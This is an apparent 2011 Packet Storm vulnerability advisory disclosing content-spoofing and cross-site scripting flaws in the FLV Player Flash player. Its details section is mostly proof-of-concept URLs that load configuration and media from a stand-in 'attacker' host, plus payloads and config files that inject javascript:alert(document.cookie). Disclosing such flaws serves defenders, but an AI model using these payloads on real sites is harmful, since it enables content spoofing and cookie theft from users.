FLV Player Content Spoofing / Cross Site Scripting

2011-08-23T00:00:00
ID PACKETSTORM:104331
Type packetstorm
Reporter MustLive
Modified 2011-08-23T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to warn you about Content Spoofing and Cross-Site Scripting  
vulnerabilities in FLV Player.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are different versions of FLV Player (MINI, NORMAL, MAXI and  
MULTI). Note, that version NORMAL occurs under names player_flv.swf and  
player_flv_classic.swf.  
  
The author of FLV Player didn't fix these vulnerabilities.  
  
----------  
Details:  
----------  
  
Content Spoofing (WASC-12):  
  
Flash-files of player FLV Player accept arbitrary addresses in parameter  
configxml, which allows to spoof content of flash - i.e. by setting address  
of configuration file from other site.  
  
http://site/player_flv.swf?configxml=http://attacker/1.xml  
  
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml  
  
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml  
  
Flash-files of player FLV Player accept arbitrary addresses in parameter  
config, which allows to spoof content of flash - i.e. by setting address of  
configuration file from other site.  
  
http://site/player_flv.swf?config=http://attacker/1.txt  
  
http://site/player_flv_maxi.swf?config=http://attacker/1.txt  
  
http://site/player_flv_multi.swf?config=http://attacker/1.txt  
  
Flash-files of player FLV Player allow to spoof all important parameters,  
including flv and startimage, and at that accept arbitrary addresses in  
parameters flv and startimage, which allows to spoof content of flash - i.e.   
by setting addresses of video and image from other site. And for setting of   
links at arbitrary site it's possible to use parameters onclick and   
ondoubleclick.  
  
http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg  
  
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg  
  
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg  
  
http://site/player_flv_mini.swf?flv=http://attacker/1.flv  
  
XSS (WASC-08):  
  
http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)  
  
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)  
  
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)  
  
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)  
  
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml  
  
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml  
  
File xss.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<config>  
<param name="onclick" value="javascript:alert(document.cookie)" />  
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />  
</config>  
  
http://site/player_flv_maxi.swf?config=http://attacker/xss.txt  
  
http://site/player_flv_multi.swf?config=http://attacker/xss.txt  
  
File xss.txt:  
  
onclick=javascript:alert(document.cookie)  
ondoubleclick=javascript:alert(document.cookie)  
  
The code will execute after a click (or double click). It's strictly social  
XSS.  
  
------------  
Timeline:  
------------  
  
2011.02.24 - found these vulnerabilities in different versions of the player  
and informed owner of the site which used it.  
2011.04.21 - announced at my site.  
2011.04.22 - informed developer.  
2011.08.20 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/5098/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
`